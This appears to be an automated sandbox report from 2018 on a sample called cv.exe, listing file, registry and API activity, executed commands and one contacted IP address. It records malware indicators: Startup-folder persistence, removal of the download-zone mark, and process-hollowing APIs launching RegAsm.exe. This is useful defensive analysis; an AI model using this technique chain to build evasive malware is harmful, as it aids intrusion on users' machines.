C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\System.Management.dll
C:\Windows
C:\Windows\Microsoft.NET
C:\Windows\Microsoft.NET\Framework
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll
C:\Users\Seven01\AppData\Local\Temp\System.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll
C:\Users\Seven01\AppData\Local\Temp\System.Drawing.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll
C:\Users\Seven01\AppData\Local\Temp\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpehost.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll
C:\Users\Seven01\AppData\Local\Temp\CSC542220C757AC48E4AE47459C9E2EBC7F.TMP
C:\Users\Seven01\AppData\Local\Temp\RESA17F.tmp
C:\Windows\System32\tzres.dll

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\cv.exe.config
C:\Users\Seven01\AppData\Local\Temp\cv.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Windows\System32\MSVCR120_CLR0400.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll
\Device\KsecDD
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp
C:\Users\Seven01\AppData\Local\Temp\1mxqb5gx.dll
C:\Users\Seven01\AppData\Local\Temp\1mxqb5gx.pdb
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1033\cscui.dll
C:\Users\Seven01\AppData\Local\Temp\1mxqb5gx.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\alink.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe.config
C:\Users\Seven01\AppData\Local\Temp\1mxqb5gx.0.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpehost.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\default.win32manifest
C:\Users\Seven01\AppData\Local\Temp\CSC542220C757AC48E4AE47459C9E2EBC7F.TMP
C:\Users\Seven01\AppData\Local\Temp\RESA17F.tmp
C:\Windows\System32\tzres.dll

Write Files

C:\Users\Seven01\AppData\Local\Temp\1mxqb5gx.tmp
C:\Users\Seven01\AppData\Local\Temp\1mxqb5gx.0.cs
C:\Users\Seven01\AppData\Local\Temp\1mxqb5gx.dll
C:\Users\Seven01\AppData\Local\Temp\1mxqb5gx.cmdline
C:\Users\Seven01\AppData\Local\Temp\1mxqb5gx.out
C:\Users\Seven01\AppData\Local\Temp\1mxqb5gx.err
C:\Users\Seven01\cv.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZQQTCD.url
C:\Users\Seven01\AppData\Local\Temp\1mxqb5gx.pdb
C:\Users\Seven01\AppData\Local\Temp\CSC542220C757AC48E4AE47459C9E2EBC7F.TMP
C:\Users\Seven01\AppData\Local\Temp\RESA17F.tmp

Delete Files

C:\Users\Seven01\AppData\Local\Temp\1mxqb5gx.cmdline
C:\Users\Seven01\AppData\Local\Temp\1mxqb5gx.0.cs
C:\Users\Seven01\AppData\Local\Temp\1mxqb5gx.out
C:\Users\Seven01\AppData\Local\Temp\1mxqb5gx.dll
C:\Users\Seven01\AppData\Local\Temp\1mxqb5gx.err
C:\Users\Seven01\AppData\Local\Temp\1mxqb5gx.pdb
C:\Users\Seven01\AppData\Local\Temp\1mxqb5gx.tmp
C:\Users\Seven01\cv.exe:Zone.Identifier
C:\Users\Seven01\AppData\Local\Temp\RESA17F.tmp
C:\Users\Seven01\AppData\Local\Temp\CSC542220C757AC48E4AE47459C9E2EBC7F.TMP

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v4.0.30319
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v4.0.30319\SKUs\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v4.0.30319\SKUs\default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cv.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\NGen\Policy\v4.0
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Servicing
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type 024
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Numerics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Numerics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml.Linq__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml.Linq__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2

Write Keys

Nothing to display

Delete Keys

Nothing to display

Mutexes

Resolved APIs

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
clr.dll.SetRuntimeInfo
clr.dll._CorExeMain
mscoree.dll.CreateConfigStream
mscoreei.dll.CreateConfigStream
kernel32.dll.GetNumaHighestNodeNumber
kernel32.dll.GetSystemWindowsDirectoryW
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddSIDToBoundaryDescriptor
kernel32.dll.CreateBoundaryDescriptorW
kernel32.dll.CreatePrivateNamespaceW
kernel32.dll.OpenPrivateNamespaceW
kernel32.dll.DeleteBoundaryDescriptor
kernel32.dll.WerRegisterRuntimeExceptionModule
kernel32.dll.RaiseException
mscoree.dll.#24
mscoreei.dll.#24
ntdll.dll.NtSetSystemInformation
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
kernel32.dll.GetNativeSystemInfo
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
clrjit.dll.sxsJitStartup
clrjit.dll.getJit
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcess
kernel32.dll.LocaleNameToLCID
kernel32.dll.LCIDToLocaleName
kernel32.dll.GetUserPreferredUILanguages
nlssorting.dll.SortGetHandle
nlssorting.dll.SortCloseHandle
kernel32.dll.GetTempPathW
ole32.dll.CoTaskMemAlloc
ole32.dll.CoTaskMemFree
kernel32.dll.GetFullPathNameW
cryptsp.dll.CryptGetDefaultProviderW
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptGenRandom
kernel32.dll.SetThreadErrorMode
kernel32.dll.CreateFileW
kernel32.dll.GetFileType
kernel32.dll.WriteFile
kernel32.dll.GetFileAttributesExW
kernel32.dll.GetCurrentDirectoryW
kernel32.dll.GetStdHandle
kernel32.dll.GetEnvironmentStrings
kernel32.dll.GetEnvironmentStringsW
kernel32.dll.FreeEnvironmentStringsW
kernel32.dll.GetACP
kernel32.dll.UnmapViewOfFile
kernel32.dll.CreateProcessW
kernel32.dll.DuplicateHandle
kernel32.dll.GetExitCodeProcess
kernel32.dll.GetFileSize
kernel32.dll.ReadFile
kernel32.dll.DeleteFileW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
kernel32.dll.FindResourceA
kernel32.dll.SizeofResource
kernel32.dll.LoadResource
kernel32.dll.LockResource
gdiplus.dll.GdiplusStartup
kernel32.dll.IsProcessorFeaturePresent
user32.dll.GetWindowInfo
user32.dll.GetAncestor
user32.dll.GetMonitorInfoA
user32.dll.EnumDisplayMonitors
user32.dll.EnumDisplayDevicesA
gdi32.dll.ExtTextOutW
gdi32.dll.GdiIsMetaPrintDC
gdiplus.dll.GdipCreateBitmapFromStream
windowscodecs.dll.DllGetClassObject
kernel32.dll.WerRegisterMemoryBlock
gdiplus.dll.GdipImageForceValidation
gdiplus.dll.GdipGetImageRawFormat
gdiplus.dll.GdipGetImageWidth
gdiplus.dll.GdipGetImageHeight
gdiplus.dll.GdipBitmapGetPixel
shell32.dll.SHGetFolderPathW
kernel32.dll.CopyFileW
kernel32.dll.DeleteFileA
kernel32.dll.WideCharToMultiByte
kernel32.dll.LoadLibraryA
kernel32.dll.GetProcAddress
kernel32.dll.GetModuleHandleA
advapi32.dll.LookupPrivilegeValueW
advapi32.dll.AdjustTokenPrivileges
ntdll.dll.NtQuerySystemInformation
kernel32.dll.CreateProcessA
kernel32.dll.GetThreadContext
kernel32.dll.Wow64GetThreadContext
kernel32.dll.SetThreadContext
kernel32.dll.Wow64SetThreadContext
kernel32.dll.ReadProcessMemory
kernel32.dll.WriteProcessMemory
ntdll.dll.NtUnmapViewOfSection
kernel32.dll.VirtualAllocEx
kernel32.dll.ResumeThread
ole32.dll.CoUninitialize
oleaut32.dll.#500
gdiplus.dll.GdipDisposeImage
cryptsp.dll.CryptReleaseContext
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
kernel32.dll.QueryActCtxW
advapi32.dll.EventUnregister
kernel32.dll.GetProcessPreferredUILanguages
kernel32.dll.GetUserDefaultUILanguage
version.dll.GetFileVersionInfoSizeA
version.dll.GetFileVersionInfoA
version.dll.VerQueryValueA
alink.dll.CreateALink
mscoree.dll.CLRCreateInstance
mscoreei.dll.CLRCreateInstance
cryptsp.dll.CryptAcquireContextA
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
clr.dll.DllGetClassObjectInternal
clr.dll.StrongNameTokenFromPublicKey
clr.dll.StrongNameFreeBuffer
clr.dll.CompareAssemblyIdentityWithConfig
clr.dll.CreateAssemblyConfigCookie
clr.dll.DestroyAssemblyConfigCookie
clr.dll.CreateAssemblyNameObject
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptExportKey
cryptsp.dll.CryptDestroyKey
mscorpehost.dll.InitializeSxS
mscorpehost.dll.CreateICeeFileGen
mscorpehost.dll.DestroyICeeFileGen
ole32.dll.CoCreateGuid
diasymreader.dll.DllGetClassObject
rpcrt4.dll.UuidCreate
kernel32.dll.NlsGetCacheUpdateCount
ole32.dll.CreateStreamOnHGlobal
mscoree.dll.CorExitProcess
mscoreei.dll.CorExitProcess

Execute Commands

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Seven01\AppData\Local\Temp\1mxqb5gx.cmdline"
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Seven01\AppData\Local\Temp\RESA17F.tmp" "c:\Users\Seven01\AppData\Local\Temp\CSC542220C757AC48E4AE47459C9E2EBC7F.TMP"

Started Services

Nothing to display

Created Services

Nothing to display
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven03b_64 Seven03b_64 VirtualBox 2018-04-27 14:06:12 2018-04-27 14:09:01 169

1 Host(s) detected

IP Address Hostname Reverse DNS
185.223.95.108 unknown customer.clientshostname.com.

Host(s) by Country

Hosts Country 1
1 unknown unknown

#infosec #automation

TheSystem Itself @ 2018-04-27 14:09:09